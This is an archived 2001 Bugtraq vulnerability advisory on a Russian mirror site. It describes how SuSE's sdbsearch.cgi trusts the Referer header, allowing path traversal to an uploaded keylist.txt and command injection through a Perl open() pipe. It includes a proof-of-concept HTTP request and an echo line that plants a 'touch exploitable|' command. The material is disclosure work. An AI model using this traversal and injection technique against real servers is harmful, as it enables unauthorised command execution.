The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


suse: sdbsearch.cgi vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 2 Aug 2001 01:09:42 +0200 (CEST)
From: Maurycy Prodeus <z33d@eth-security.net>
To: bugtraq@securityfocus.com
Subject: suse: sdbsearch.cgi vulnerability

Hello,
I found weakness in sdbsearch.cgi script which is a part of Suse distribution.
This is perl script and since Suse 7.1 they have introduced some form of
protection (interpreter is called with tainting checking). However, I think
it isn't enough and this bug still may produce danger.

Sdbsearch.cgi trusts content of HTTP_REFERER variable which is set by client
side during http's requests. Piece of this data is used to locating file with
keywords and referenced files. If there is possiblity to put such file
on attacked host (i.e. upload through ftpd) with special content, sdbsearch
will use open() to get access to match files. So we can make standard open()
pipe based attack (only without -T option). Name of uploaded file has to
be "keylist.txt" because we manipulate only on pathname, using double dots.

Proof of concept is very simple, just create harmful keylist.txt for instance 
in /tmp directory and send request to http server like this:

GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
(very deep traversal because we don't know what is DOCUMENT_ROOT)

and an example content of our /tmp/keylist.txt create like this:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt

After successful attempt there will be "exploitable" file in /tmp directory.

Affected system:
	Suse 6.x 7.x (7.1 and 7.2 have tainting protection, but even then
	we can pass sdbsearch files which shouldn't be read)
Patch: 
	Just filter HTTP_REFERER variable.

- z33d

-- 
je Art_of_self_destruct
pushl %eax
pushl %eax
pushl %ebx
pushl %ebx
 popl %ecx	----== http://z33d.eth-security.net ==----
pushl %eax
pushl %eax
pushl %ebx
pushl %ebx
Art_of_self_destruct:
hlt

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру